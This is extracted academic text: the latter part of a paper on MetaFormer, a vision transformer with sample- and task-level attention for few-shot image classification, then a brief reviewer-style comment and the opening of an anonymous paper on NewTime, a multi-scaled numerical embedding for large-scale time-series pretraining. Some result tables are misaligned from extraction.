modules on top of the feature extractor with global feature embedding (Ye et al., 2020; Doersch et al., 2020; Hiller et al., 2022). However, it is demonstrated that different layers of the backbone yield different semantic levels of feature embedding and thus different types of knowledge (Raghu et al., 2021). Motivated by this, we propose to leverage coarse-to-grain multi-scale information across layers to capture discriminative sample interactions at the patch token level. Joint Space-Sample Attention. A straightforward and intuitive approach is to perform self-attention over both the spatial and sample dimensions simultaneously. Given the task input $X$, the core computation of one MSA layer primarily revolves around calculating the attention matrix $A_J \in \mathbb{R}^{(NK+M)L \times (NK+M)L}$ in equation 1. Therefore, the complexity of the joint space-sample attention is $O((NK + M)^2 L^2)$. Such joint space-sample interaction empowers the vision transformer to capture sample relationships for task-specific embedding, but it comes at a high computational cost and incurs heavy memory footprints. Decoupled Space-Sample Attention. To alleviate the computational complexity, we propose a more efficient architecture designed to decouple spatial attention and sample attention, illustrated in Figure 1(b). In the case of decoupled space-sample attention, within each layer, our approach initially computes spatial-only attention as equation 1 to obtain features isolating backgrounds and emphasizing underlying objects. Subsequently, we reshape the token sequence to $\mathbb{R}^{L \times (NK+M) \times d}$ that is fed to MSA with sample attention matrix $A_S \in \mathbb{R}^{(NK+M) \times (NK+M)}$, incorporating sample interactions across all patches at the same spatial location to capture the similarities and variances among samples, which is essential for the feature extraction in a given task to discern task-specific discriminative regions. As such, the computation complexity is reduced to \( O(L(NK + M)^2 + (NK + M)L^2) \). See Figure 5 in Appendix B for an illustration. Though this decoupling shares the spirit with video transformers (Ho et al., 2019; Bertasius et al., 2021), it is crucial to highlight that our consideration of the sample-to-sample relationship in few-shot learning presents a unique challenge distinct from the frame-to-frame relationship in videos, i.e., query samples have to be differentiated from support ones. This challenge motivates the following introduction of sample causal masks. **Sample-level Attention Module (SAM).** As shown in Figure 1(c), we introduce our Sample-level Attention Module (SAM) with label infusion and the designed causal masking mechanism to further enforce consistency in the attended features across samples within a task. We first get the embedded support category information \( W^c y \in \mathbb{R}^{1 \times d} \) via the linear projection matrix \( W^c \), which is infused to support tokens through the elementwise addition. For the obtained sample attention \( A_S \), we maintain the sample causal mask \( H \in \mathbb{R}^{(NK+M) \times (NK+M)} \) to restrict the sample interaction patterns as: \[ \hat{A}_S = A_S \odot H \] where \( \odot \) is the element-wise product. Through the constraint, support samples can attend themselves to strengthen intra- and inter-class discriminative clues, which query samples utilize for task-specific feature consistency learning. Note that this mask mechanism also makes our method comply with the inductive protocols. In the autoregressive scenario, we also extend our SAM with the autoregressive causally-masked sample attention to embed the query-query interactions into the vision transformer. Figure 2(b) shows an example mask with \( N = 4 \) and \( K = 1 \). Query samples attend to support samples and earlier predicted queries in an autoregressive fashion, which thus serves to implicitly expand the support set for subsequent query predictions. ### 3.3 Task-level Attention Module In this section, we introduce the details of the proposed Task-level Attention Module (TAM), as illustrated in Figure 1(d). The goal of TAM is to transfer previous task knowledge for regularizing the adaptation in the current task. To this end, we introduce a knowledge pool consolidated during meta-training to organize learned knowledge. When a new task comes, we first acquire the task-specific probe vector to represent the current task. It taps into the knowledge pool to retrieve relevant knowledge from historical tasks, which is fused to enhance the support feature representations. We elaborate on four key components as follows: task probe vector aggregation, knowledge retrieval, pool consolidation, and knowledge fusion. **Task Probe Vector Aggregation.** Given a task consisting of support and query sets, we first gather the task information with learnable task probe vectors \( G \in \mathbb{R}^{T \times d} \), which are computed along with support patch tokens \( X_c \) to aggregate the key parts of samples and the whole task representations. Specifically, we perform the task aggregation using attention as: \[ \text{Aggregation}(Q_G, K_{X_c}, V_{X_c}) = \text{MSA}(Q_G, K_{X_c}, V_{X_c}) \] where \( Q_G \) is query embedding of task probe vectors; \( K_{X_c} \) and \( V_{X_c} \) are key and value embeddings of support patch tokens, respectively. This allows task probe vectors to focus on relevant task-specific feature patterns and ignore irrelevant semantics of each sample. **Knowledge Retrieval.** After gathering the task information, we retrieve relevant knowledge using a simple weighted summation strategy from the knowledge pool \( P \in \mathbb{R}^{Z \times d} \) with \( Z \) components (which will be introduced below). The retrieval is formulated as: \[ R = \sum_z \gamma(G, P_z) P_z \] where $\gamma$ is the score function based on cosine similarity between task probe vectors and pool components. $R \in \mathbb{R}^{T \times d}$ is the retrieved historical knowledge that can be thought of as key feature semantics (e.g., ears and eyes of the dog) related to the current task samples. **Pool Consolidation.** During meta-training, we maintain a knowledge pool $P$ updated by every sequentially coming task. To consolidate the learned knowledge in the pool, we select relevant components from the pool and integrate them with new information brought by the current task as follows: $$P_s = P_s + G_i$$ (5) where $s = \text{argmax} \gamma(G_i, P)$ representing components most similar to $i$-th task probe vector. This method also allows us to control the pool size and the memory consumption. **Knowledge Fusion.** To regularize the adaptation of new tasks with historical knowledge, we deliver the union of original task vectors $G$ and retrieved knowledge $R$ to enhance the support patch token representations via the attention mechanism as follows: $$\text{Fusion}(Q_{X_c}, K_{[G;R]}, V_{[G;R]}) = \text{MSA}(Q_{X_c}, K_{[G;R]}, V_{[G;R]})$$ (6) where $Q_{X_c}$ is query embedding of support patch tokens and $K_{[G;R]}$ and $V_{[G;R]}$ are key and value embeddings of regularized task-specific semantics, respectively. The intuition here is to leverage well-learned feature semantics in previous similar tasks to strengthen discriminative regions in the new task. ### 3.4 MetaFormer with Holistic Attention Using SAM and TAM as the basic building blocks working in conjunction with original ViT modules, we propose a new vision transformer with holistic attention, named MetaFormer $f_\theta$, customized for meta-learning in the few-shot image classification. Holistic attention incorporates both the intra- and inter-task interactions at different semantic levels to extract rich task-specific feature representation and thus adapt to new tasks more effectively. Built upon feature embedding extracted by MetaFormer, we estimate the class patch prototypes by averaging support patch tokens per class $p_k = \frac{1}{|C^k|} \sum_{x \in C^k} f_\theta(x)$. Query samples are predicted based on patch-wise cosine similarity with prototypes (Lai et al., 2022; Hiller et al., 2022). The probability of $k^{th}$ category is: $$P(\hat{y}_t = k | x_t) = \frac{e^{d(f_\theta(x_t), p_k)/\tau}}{\sum_c e^{d(f_\theta(x_t), p_c)/\tau}}$$ (7) where $d$ indicates the cosine distance and $\tau$ is scaling temperature. The cross-entropy loss function with the few-shot label $y_t$ is: $$L_{CE} = -\sum_{t=1}^{M} \log P(\hat{y}_t = y_t | x_t)$$ (8) **Autoregressive Inference.** In the autoregressive setting, we propose to enrich the support prototypes by feeding previously predicted queries as the auxiliary support set $Q$ with predicted probability belonging to class $k$. We take $P(\hat{y}_t = k | x_t)$ as sample weights and estimate auxiliary prototypes in a weighted average manner $\hat{p}_k = \frac{1}{\sum_{x \in Q^k} P(k | x)} \sum_{x \in Q^k} P(k | x) f_\theta(x)$. Then new prototypes can be updated by the mean of $p_k$ and $\hat{p}_k$. Furthermore, considering modeling dependencies between all $M$ query samples requires $M$ prototype updates. Alternatively, we introduce $r$ sampling size of queries at a time to achieve faster and more consistent prototype updates. ### 4 Experiments We evaluate the effectiveness of our proposed MetaFormer on few-shot image classification tasks, including standard in-domain few-shot learning in Section 4.1 and conduct a broader study of cross-domain and multi-domain few-shot learning in Section 4.2. Additionally, we conduct ablation studies to verify the effectiveness of the proposed holistic attention modeling with Sample-level Attention Module (SAM) and Task-level Attention Module (TAM) in Section 4.3 and Section 4.4. 4.1 STANDARD FEW-SHOT LEARNING Datasets. We train and evaluate our MetaFormer on the four standard few-shot benchmarks: miniImageNet (Vinyals et al., 2016b), tieredImageNet (Ren et al., 2018b), CIFAR-FS (Bertinetto et al., 2019) and FC-100 (Oreshkin et al., 2018). In all experiments, we follow the standard data usage specifications same as (Hiller et al., 2022), splitting data into the meta-training set, meta-validation set, and meta-test set, and classes in each set are mutually exclusive. The details of each dataset are described in Appendix L.1. Implementation Details. We train our method in two stages following Hiller et al. (2022): self-supervised pretraining and meta-tuning. We first pre-train our vision transformer backbone (Dosovitskiy et al., 2020; Liu et al., 2021) utilizing a self-supervised training objective (Zhou et al., 2022a). Subsequently, we integrate our proposed SAM and TAM into the original vision transformer for meta-learning. We denote MetaFormer-I to predict queries independently in the inductive setting and MetaFormer-A for the autoregressive scenario. Further detailed training and evaluation settings are included in the Appendix L.2. Comparison to the State-Of-The-Art Methods. The comparison results with related or recent state-of-the-art (SOTA) methods on miniImageNet and tieredImageNet is shown in Table 1. In comparison to previous state-of-the-art meta-learning approaches, our method outperforms them significantly. For example, on miniImageNet, MetaFormer-I surpasses its meta-learning competitor FewTURE (Hiller et al., 2022) by 7.76% and 5.51% in 1-shot and 5-shot settings, respectively. This demonstrates the remarkable effectiveness of our proposed holistic attention mechanism to fully leverage the transformer potential for meta-learning. SMKD+MetaFormer-I also outperforms self-distillation based methods (He et al., 2022b; Lin et al., 2023). Table 2 displays results on the CIFAR-FS and FC100 datasets. MetaFormer-I also achieves better performance than previous methods, which shows the superiority of our proposed method. We note that our MetaFormer-A significantly enhances performance, establishing a new baseline for autoregressive few-shot image classification tasks. See Table 4 in Appendix C for the comparison with Swin backbone. Table 1: Average classification accuracy (%) for 5-way 1-shot and 5-way 5-shot scenarios. Reported are the mean and 95% confidence interval on the unseen test sets of miniImageNet (Vinyals et al., 2016a) and tieredImageNet (Ren et al., 2018a), using the established evaluation protocols. | Method | Backbone | # Params | miniImageNet 1-shot | miniImageNet 5-shot | tieredImageNet 1-shot | tieredImageNet 5-shot | |-------------------------|----------|----------|--------------------|--------------------|------------------------|------------------------| | MatchNet (Vinyals et al., 2016b) | ResNet-12 | 12.4 M | 61.24±0.29 | 73.93±0.23 | 71.01±0.33 | 83.12±0.24 | | ProtoNet (Snell et al., 2017) | ResNet-12 | 12.4 M | 62.29±0.33 | 79.46±0.48 | 68.25±0.23 | 84.01±0.56 | | FEAT (Ye et al., 2020) | ResNet-12 | 14.1 M | 66.78±0.20 | 82.05±0.14 | 70.80±0.23 | 84.79±0.16 | | DeepEMD (Zhang et al., 2020a) | ResNet-12 | 12.4 M | 65.91±0.82 | 82.41±0.56 | 71.16±0.87 | 86.03±0.58 | | IEPT (Zhang et al., 2020b) | ResNet-12 | 12.4 M | 67.05±0.44 | 82.90±0.30 | 72.24±0.50 | 86.73±0.34 | | MELR (Fei et al., 2020) | ResNet-12 | 14.1 M | 67.40±0.43 | 83.40±0.28 | 72.14±0.51 | 87.01±0.35 | | FRN (Wertheimer et al., 2021) | ResNet-12 | 12.4 M | 66.45±0.19 | 82.83±0.13 | 72.06±0.22 | 86.89±0.14 | | CG (Zhao et al., 2021) | ResNet-12 | 12.4 M | 67.02±0.20 | 82.32±0.14 | 71.66±0.23 | 85.50±0.15 | | DMF (Xu et al., 2021) | ResNet-12 | 12.4 M | 67.76±0.46 | 82.71±0.31 | 71.89±0.52 | 85.96±0.35 | | BML (Zhou et al., 2021b) | ResNet-12 | 12.4 M | 67.04±0.63 | 83.63±0.29 | 68.99±0.50 | 85.49±0.34 | | CNL (Zhao et al., 2021) | ResNet-12 | 12.4 M | 67.96±0.98 | 83.36±0.51 | 73.42±0.95 | 87.72±0.75 | | Meta-NVG (Zhang et al., 2021a) | ResNet-12 | 12.4 M | 67.14±0.80 | 83.82±0.51 | 74.58±0.88 | 86.73±0.61 | | RENet (Kang et al., 2021) | ResNet-12 | 12.6 M | 67.60±0.44 | 82.58±0.30 | 71.61±0.51 | 85.28±0.35 | | PAL (Ma et al., 2021a) | ResNet-12 | 12.4 M | 69.37±0.64 | 84.40±0.44 | 72.25±0.72 | 86.95±0.47 | | COSOC (Luo et al., 2021) | ResNet-12 | 12.4 M | 69.28±0.49 | 85.16±0.42 | 73.57±0.43 | 87.57±0.10 | | Meta DeepBDC (Xie et al., 2022) | ResNet-12 | 12.4 M | 67.34±0.43 | 84.46±0.28 | 72.34±0.40 | 87.31±0.32 | | LEO (Rusu et al., 2020) | WRN-16-10 | 36.8 M | 61.76±0.08 | 77.59±0.12 | 68.04±0.14 | 84.44±0.09 | | MetaMIL (Xu et al., 2020) | WRN-28-10 | 37.7 M | 62.01±0.30 | 78.01±0.16 | 67.72±0.14 | 83.36±0.12 | | CCNet (Gidaris et al., 2019) | WRN-28-10 | 36.5 M | 62.93±0.30 | 78.87±0.08 | 70.53±0.11 | 84.98±0.36 | | FEAT (Ye et al., 2020) | WRN-28-10 | 38.1 M | 65.10±0.30 | 81.11±0.14 | 70.41±0.23 | 84.38±0.16 | | MetaQDA (Zhang et al., 2021c) | WRN-28-10 | 36.5 M | 67.83±0.64 | 84.28±0.69 | 74.33±0.65 | 89.56±0.79 | | OM (Qi et al., 2021) | WRN-28-10 | 36.5 M | 66.78±0.30 | 85.29±0.41 | 71.54±0.29 | 87.79±0.46 | | SUN (Dong et al., 2022) | ViT | 12.5 M | 67.80±0.45 | 83.23±0.30 | 72.99±0.50 | 86.74±0.33 | | FewTURE (Hiller et al., 2022) | ViT-Small | 22 M | 68.02±0.88 | 84.51±0.53 | 72.96±0.92 | 86.43±0.67 | | FewTURE (Hiller et al., 2022) | Swin-Tiny | 29 M | 72.40±0.78 | 86.38±0.49 | 76.32±0.87 | 89.96±0.55 | | MetaFormer-I (Ours) | ViT-Small | 24.5 M | 75.78±0.71 | 90.02±0.44 | 79.05±0.61 | 90.40±0.53 | | MetaFormer-A (Ours) | ViT-Small | 24.5 M | 79.41±0.73 | 91.21±0.44 | 84.41±0.79 | 92.47±0.47 | | HCTransformers (He et al., 2022b)| 3×ViT-Small | 63 M | 74.74±0.17 | 89.19±0.13 | 79.67±0.20 | 91.72±0.11 | | SMKD (Lin et al., 2023) | ViT-Small | 21 M | 74.28±0.18 | 88.89±0.09 | 78.83±0.20 | 91.21±0.11 | | SMKD + MetaFormer-I (Ours) | ViT-Small | 24.5 M | 76.54±0.73 | 90.76±0.41 | 80.57±0.82 | 92.42±0.49 | | SMKD + MetaFormer-A (Ours) | ViT-Small | 24.5 M | 81.61±0.75 | 92.25±0.40 | 84.43±0.80 | 93.41±0.49 | Table 2: Average classification accuracy (%) for 5-way 1-shot and 5-way 5-shot scenarios. Reported are the mean and 95% confidence interval on the unseen test sets of CIFAR-FS (Bertinetto et al., 2019) and FC100 (Oreshkin et al., 2018), using the established evaluation protocols. | Method | Backbone | # Params | CIFAR-FS | FC100 | |-------------------------------|----------------|----------|-------------------|------------------| | | | | 1-shot | 5-shot | | ProtoNet (Snell et al., 2017) | ResNet-12 | 12.4 M | - | 41.54±0.76 | | | | | | 57.08±0.76 | | MetaOpt (Lee et al., 2019) | ResNet-12 | 12.4 M | 72.00±0.70 | 41.10±0.60 | | | | | | 55.50±0.60 | | MABAS (Kim et al., 2020) | ResNet-12 | 12.4 M | 73.51±0.92 | 42.31±0.75 | | | | | | 58.16±0.78 | | RFS (Tian et al., 2020) | ResNet-12 | 12.4 M | 73.90±0.80 | 44.60±0.70 | | | | | | 60.90±0.60 | | Meta-NVG (Zhang et al., 2021a)| ResNet-12 | 12.4 M | 74.63±0.91 | 46.40±0.81 | | | | | | 61.33±0.71 | | RENet (Kang et al., 2021) | ResNet-12 | 12.6 M | 74.51±0.46 | - | | | | | | | | TPMM (Wu et al., 2021) | ResNet-12 | 12.4 M | 75.50±0.90 | 46.93±0.71 | | | | | | 63.26±0.74 | | MixFSL (Afrasyabi et al., 2021)| ResNet-12 | 12.4 M | - | 44.89±0.63 | | | | | | 60.70±0.60 | | PSST (Chen et al., 2021b) | WRN-28-10 | 36.5 M | 77.02±0.38 | - | | | | | | - | | Meta-QDA (Zhang et al., 2021c)| WRN-28-10 | 36.5 M | 75.83±0.88 | - | | | | | | - | | SUN (Dong et al., 2022) | ViT | 12.5M | 78.37±0.46 | - | | | | | | - | | FewTURE (Hiller et al., 2022) | ViT-Small | 22 M | 76.10±0.88 | 46.20±0.79 | | | | | | 63.14±0.73 | | FewTURE (Hiller et al., 2022) | Swin-Tiny | 29 M | 77.76±0.81 | 47.68±0.78 | | | | | | 63.81±0.75 | | MetaFormer-I (Ours) | ViT-Small | 24.5 M | 80.16±0.76 | 51.14±0.71 | | | | | | 68.33±0.74 | | MetaFormer-A (Ours) | ViT-Small | 24.5 M | 83.48±0.75 | 53.76±0.80 | | | | | | 70.68±0.74 | | Hu Transformers (He et al., 2022b) | 5×ViT-Small | 63 M | 78.89±0.18 | 48.27±0.15 | | | | | | 60.42±0.16 | | SMKD (Lin et al., 2023) | ViT-Small | 21 M | 80.08±0.18 | 50.38±0.16 | | | | | | 68.50±0.16 | | SMKD + MetaFormer-I (Ours) | ViT-Small | 24.5 M | 81.49±0.74 | 52.18±0.78 | | | | | | 71.29±0.73 | | SMKD + MetaFormer-A (Ours) | ViT-Small | 24.5 M | 85.59±0.76 | 55.68±0.86 | | | | | | 73.31±0.77 | 4.2 Broader Study of Few-Shot Learning To further investigate the fast adaptation ability of our method, we evaluate the MetaFormer in more challenging cross-domain (Chen et al., 2019; Oh et al., 2022) and multi-domain (Triantafillou et al., 2020) scenarios, containing both the class and domain shifts. Appendix M and Appendix N provide the benchmark datasets and implementation details. Cross-Domain and Multi-Domain Few-shot Classification Results. We evaluate MetaFormer meta-trained on miniImageNet on cross-domain few-shot classification benchmarks following Oh et al. (2022) in Table 12 (Appendix M.3). Compared with previous in-domain state-of-the-art meta-learning (Hiller et al., 2022) and self-supervised learning (Lin et al., 2023) methods, MetaFormer achieves significant performance improvement by up to 10.51%, underscoring its task adaptability in the face of domain gaps. In Table 13 (Appendix N.3), we assess the effectiveness of MetaFormer on the large-scale and challenging Meta-Dataset. MetaFormer surpasses PMF (Hu et al., 2022) to handle tasks with substantially different distributions. We attribute such impressive improvement to our proposed holistic attention, a mechanism that not only facilitates sample correspondence learning but also enables knowledge reuse through inter-task attention, thus aiding task adaptation to obtain more discriminative feature representations in each task. 4.3 Ablation Study Table 3: Component ablation studies and the number of additional learnable parameters on miniImageNet. | SAM | TAM | Add. Params. | miniImageNet | |-----|-----|-------------|-----------------------| | ✔ | ✔ | +3.57M | 75.78 ± 0.71 | | | | | 90.02 ± 0.44 | | ✔ | ✗ | +2.01M | 74.64 ± 0.76 | | | ✔ | +1.56M | 73.63 ± 0.75 | | | | | 87.76 ± 0.52 | Component Analysis. In this section, we investigate the individual contributions of each component in MetaFormer by removing the components one by one: Sample-level Attention Module (SAM), and Task-level Attention Module (TAM). The impact on performance and the increase in the number of additional learnable parameters are detailed in Table 3. This table validates the contribution of each module, demonstrating that they enhance performance with only a modest increase in computational overhead. Specifically, the introduction of SAM results in a 2.15% performance gain in the 1-shot setting by facilitating sample correspondence learning, thereby enhancing consistency within the task. Furthermore, the incorporation of TAM further leads to an additional improvement of 2.49% in the 5-shot setting, is achieved by regularizing the current task with retrieved relevant semantics. See Appendix D for more ablation analysis. 4.4 Qualitative Analysis Figure 3 shows visualizations of our holistic attention. Columns respectively illustrate the attention map of three attention modules. The results demonstrate that the sample correspondence learning guided by spatial attention and sample attention modules can suppress irrelevant regions via exploiting pattern relations within and across samples, thereby learning more discriminative task-specific features. Building on this foundation, the task attention module facilitates the transfer of semantic knowledge from the previous task to the new one, focusing particularly on the key components of foreground objects. When integrated with intra- and inter-task attention, our holistic attention yields a more accurate and comprehensive response map concentrated on the foreground region. 5 Conclusions This paper proposes MetaFormer, a novel Vit-backed meta-learning approach for few-shot classification. To fully leverage transformer characteristics, MetaFormer builds holistic attention by introducing two lightweight modules to capture intra-task and inter-task interactions. With the Sample-level Attention Module (SAM), MetaFormer captures task-specific discriminative feature representations by facilitating sample correspondence learning to enforce consistency within a task. Meanwhile, the Task-level Attention Module (TAM) retrieves most relevant knowledge from seen tasks to regularize learning of the current task via maintaining a dynamic knowledge pool. We also extend our MetaFormer to build the new baseline in the autoregressive few-shot image classification setting. Extensive experiments demonstrate the superiority of MetaFormer in the meta-learning approach family, achieving remarkable performance on the standard in-domain benchmarks as well as more challenging cross-domain and multi-domain benchmarks. REFERENCES Arman Afrasiyabi, Jean-François Lalonde, and Christian Gagné. Mixture-based feature space learning for few-shot image classification. In Proceedings of the IEEE/CVF International Conference on Computer Vision (ICCV), pp. 9041–9051, 2021. Hangbo Bao, Li Dong, Songhao Piao, and Furu Wei. BEit: BERT pre-training of image transformers. In International Conference on Learning Representations, 2022. Peyman Bateni, Raghav Goyal, Vaden Masrani, Frank Wood, and Leonid Sigal. Improved few-shot visual classification. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 14493–14502, 2020. Yassir Bendou, Yuqing Hu, Raphael Lafargue, Giulia Lioi, Bastien Pasdeloup, Stéphane Pateux, and Vincent Gripon. Easy—ensemble augmented-shot-y-shaped learning: State-of-the-art few-shot classification with simple components. Journal of Imaging, 8(7):179, 2022. Gedas Bertasius, Heng Wang, and Lorenzo Torresani. Is space-time attention all you need for video understanding? In ICML, volume 2, pp. 4, 2021. Luca Bertinetto, João F Henriques, Jack Valmadre, Philip Torr, and Andrea Vedaldi. Learning feed-forward one-shot learners. Advances in neural information processing systems, 29, 2016. Luca Bertinetto, Joao F Henriques, Philip Torr, and Andrea Vedaldi. Meta-learning with differentiable closed-form solvers. In International Conference on Learning Representations, 2019. Wessel P. Bruinsma, Stratis Markou, James Requeima, Andrew Y. K. Foong, Tom R. Andersson, Anna Vaughan, Anthony Buonomo, J. Scott Hosking, and Richard E. Turner. Autoregressive conditional neural processes. In The Eleventh International Conference on Learning Representations, ICLR 2023, Kigali, Rwanda, May 1-5, 2023, 2023. Qi Cai, Yingwei Pan, Ting Yao, Chenggang Yan, and Tao Mei. Memory matching networks for one-shot image recognition. In Proceedings of the IEEE conference on computer vision and pattern recognition, pp. 4080–4088, 2018. Mathilde Caron, Hugo Touvron, Ishan Misra, Hervé Jégou, Julien Mairal, Piotr Bojanowski, and Armand Joulin. Emerging properties in self-supervised vision transformers. In Proceedings of the IEEE/CVF International Conference on Computer Vision, pp. 9650–9660, 2021. Wei-Yu Chen, Yen-Cheng Liu, Zsolt Kira, Yu-Chiang Wang, and Jia-Bin Huang. A closer look at few-shot classification. In International Conference on Learning Representations, 2019. Yinbo Chen, Zhuang Liu, Huijuan Xu, Trevor Darrell, and Xiaolong Wang. Meta-baseline: Exploring simple meta-learning for few-shot learning. In Proceedings of the IEEE/CVF International Conference on Computer Vision, pp. 9062–9071, 2021a. Zhengyu Chen, Jixie Ge, Heshen Zhan, Siteng Huang, and Donglin Wang. Pareto self-supervised training for few-shot learning. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 13663–13672, 2021b. Carl Doersch, Ankush Gupta, and Andrew Zisserman. Crosstransformers: spatially-aware few-shot transfer. Advances in Neural Information Processing Systems, 33:21981–21993, 2020. Bowen Dong, Pan Zhou, Shuicheng Yan, and Wangmeng Zuo. Self-promoted supervision for few-shot transformer. In European Conference on Computer Vision, pp. 329–347. Springer, 2022. Alexey Dosovitskiy, Lucas Beyer, Alexander Kolesnikov, Dirk Weissenborn, Xiaohua Zhai, Thomas Unterthiner, Mostafa Dehghani, Matthias Minderer, Georg Heigold, Sylvain Gelly, et al. An image is worth 16x16 words: Transformers for image recognition at scale. arXiv preprint arXiv:2010.11929, 2020. Arthur Douillard, Alexandre Ramé, Guillaume Couairon, and Matthieu Cord. Dytox: Transformers for continual learning with dynamic token expansion. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 9285–9295, 2022.
QVVSb0GMXK
For time series from different domains, it is hard to determine a universal window length which works for all time series and contains data of single scale. The authors may wanna clarify that how they resolve this problem.
NewTime: Numerically Multi-Scaled Embedding for Large-Scale Time Series Pretraining Anonymous authors Paper under double-blind review Abstract Recent research on time-series self-supervised models shows great promise in learning semantic representations. However, it has been limited to small-scale datasets, e.g., thousands of temporal sequences. In this work, we make key technical contributions that are tailored to the numerical properties of time-series data and allow the model to scale to large datasets, e.g., millions of temporal sequences. We adopt the Transformer architecture by first partitioning the input into non-overlapping windows. Each window is then characterized by its normalized shape and two scalar values denoting the mean and standard deviation within each window. To embed scalar values that may possess arbitrary numerical scales to high-dimensional vectors, we propose a numerically multi-scaled embedding module enumerating all possible scales for the scalar values. The model undergoes pre-training using the proposed numerically multi-scaled embedding with a simple contrastive objective on a large-scale dataset containing over a million sequences. We study its transfer performance on a number of univariate and multivariate classification benchmarks. Our method exhibits remarkable improvement against previous representation learning approaches and establishes the new state of the art, even compared with domain-specific non-learning-based methods. 1 Introduction Despite the phenomenal achievement of large-scale representation learning on various data modalities (Brown et al., 2020; Radford et al., 2021; Caron et al., 2021), the research for time-series representation learning is mostly limited to small-scale datasets without attaining generalization capabilities (Eldele et al., 2021b; Yue et al., 2022; Zhang et al., 2022). Since time-series data may cover a diverse range of domains, such as medical, weather, traffic and more, large-scale training across domains brings special challenges and opportunities for transfer learning. We notice a unique characteristic of time-series data and its representation. While RGB images are represented by fixed and discretized numerical values from 0 to 255, and natural languages are tokenized to a fixed dictionary, time-series data exhibit numerical values that are continuous and of drastically different scales. For instance, temperature usually varies from -30 to 30 degrees Celsius, but altitude is on the scale of $10^3$ meters. The scale of numerical variations generally depends on the physical properties of the time-series data. As illustrated in Figure 1, sequences from certain time-series categories and even a single time-series sequence may exhibit structures at multiple scales due to a change in physical properties. Deep neural networks trained with gradient descent need proper normalization for optimization to a good local minimum (Ioffe & Szegedy, 2015; Ba et al., 2016). However, encoding the time-series data to a normalized vector space turns out to be a non-trivial problem. Z-score normalization is a popular technique that assumes a single dominant scale in the dataset. Instance normalization preprocesses the data by per-instance statistics and thus removes information that could be critical for representation learning. As a result, both of the conventional data encoding methods fail to effectively encode time-series data with a high variation of numerical scales. Additionally, the distribution shift problem (Fawaz et al., 2018) between pretraining and finetuning requires the model to generalize and adapt to novel variation scales. The dilemma between normalization for effective network optimization and high variation of data scales poses a challenge for time-series representation learning, especially in the large-scale scenario. Figure 1: (a) Numerical scales of three temporal sequences from three datasets differ significantly. (b) Even a single sequence may contain multiple scales of variations. The zoom-in view shows the local structure of small variations. Note that sequences are shifted above the x-axis and presented in a logarithmic scale for better visualizations. We introduce NewTime, a Transformer-based architecture for time-series data with a novel embedding module to effectively embed data of arbitrary scale. For a time-series sequence, we first divide it into non-overlapping small windows, so that data within each window has a simple structure that can be easily modeled at a single scale. A window is characterized by three factors: its mean and standard deviation (std), and the normalized shape. The embedding vectors of the three factors are combined and fed as an input token to a general-purpose Transformer for representation learning. The normalized shape across both windows and samples are of similar numerical scales, and thus can be embedded by a simple linear layer. The challenge of embedding the entire sequence reduces to the embedding of a set of means and standard deviations, which may vary in scale arbitrarily. To encode these scalars to a high-dimensional vector space, we propose a numerically multi-scaled embedding module. Since encoding through network modules, such as a linear layer, may need to assume the scale of the input data, our idea is to simply enumerate all possible scales for the scalar and later fuse the embeddings across scales. We use a basic building block of a linear layer followed by a LayerNorm (Ba et al., 2016) to map a scalar to a normalized vector space. Such a basic building block is sensitive to the input range, which is controlled by a multiplier on the bias in the linear layer. We thus use parallel building blocks with different multipliers set for each scale. The output embeddings are aggregated by a weighting mechanism to derive the final scalar embedding. To conduct large-scale representation learning, we collect pretraining data by fusing existing datasets from multiple sources, yielding a dataset with over one million time-series sequences. We pretrain our NewTime model using a straightforward BYOL (Grill et al., 2020) self-supervised learning objective and study the transfer performance on popular classification benchmarks. NewTime obtains remarkable improvements on both univariate and multivariate time series classification tasks and achieves new state-of-the-art results across benchmarks. We also demonstrate that NewTime outperforms recent approaches on few-shot learning without being designed for this task and it can easily transfer to various downstream tasks, such as clustering and anomaly detection. In summary, this work makes three key contributions: - We propose a numerically multi-scaled embedding module for encoding scalar values in a wide range into a normalized vector space. - We design a Transformer-based solution for time series representation learning with each input token representing its shape embedding, mean embedding, and std embedding. - We conduct the first large-scale self-supervised pretraining for time-series data and demonstrate that transferable representations could be learned from the vast set of disparate data. 2 RELATED WORK 2.1 UNSUPERVISED REPRESENTATION LEARNING FOR TIME SERIES Several studies have successfully applied unsupervised representation learning to time series data. T-Loss (Franceschi et al., 2019) is a leading effort that combines a dilated causal architecture and a triplet loss. TS-TCC (Eldele et al., 2021a) and TS2Vec (Yue et al., 2022) further incorporate dedicated learning objectives, e.g., contextual and hierarchical losses, and handcrafted augmentation functions. TST (Zerveas et al., 2021) formulates a masked modeling framework for time series representation learning. BTSF (Yang & Hong, 2022) and TF-C (Zhang et al., 2022) introduce a complementary frequency domain with consistency between the temporal and the frequency domain as the supervision signal. All of these works show that the unsupervised pretrained model can offer a substantial improvement against the fully supervised counterpart. Albeit encouraging, most of these works limit pretraining to small datasets and focus on a “one-to-one” scenario, i.e., pretrain on a single dataset and fine-tune on the same or a similar domain. Zhang et al. (2022) take a step further and investigate a “one-to-many” setting that fine-tunes an EEG-pretrained model for either hand-gesture recognition or mechanical fault prediction. They also discuss a ‘many-to-one’ setting where the model is pretrained on a mixture of multiple datasets and subsequently finetuned on a single pure dataset. However, the finetuning performance decreases with increasing heterogeneity of pretraining datasets. The essence of unsupervised learning, which is capable of taking advantage of large amounts of data, remains to be explored. 2.2 Numerical Data Normalization Data encoding and normalization play a key role in machine learning systems. Z-score and instance normalization are two popular methods commonly used in time series analysis. Z-score normalizes the data according to dataset statistics and thus is prone to the distribution shift problem. Instance normalization standardizes each sample to zero mean and unit standard deviation, but removes part of the information to recover the raw data. To address this issue, reversible instance normalization (Kim et al., 2021) is proposed to add back the mean and std statistics at the network predictions for forecasting problems. Gorishniy et al. (2022) explore embedding numerical features using piece-wise linear and periodic functions for tabular data. Our work is similar in proposing an effective numerical embedding for scalar values. Unlike previous works, the goal of this work is to enable large-scale pretraining for time-series data. 3 NEWTime 3.1 Problem Statement Our goal is to conduct self-supervised pretraining for time series on a large-scale dataset, covering various domains with very different signal characteristics. Due to the nature of the physical properties, time-series data may have different scales of variations. For example, sequences belonging to a certain category may exhibit variations on a numerical scale of 0.01, whereas those from another category may vary on a numerical scale of $10^4$. Variation scales may even change within a single time-series sequence. Joint training on such diverse large-scale datasets introduces new challenges. Normalization for data preprocessing is a viable technique for mitigating the aforementioned issue. Popular normalization methods include Z-score and instance normalization. Z-score involves computing the mean and standard deviation statistics for the entire dataset, subsequently 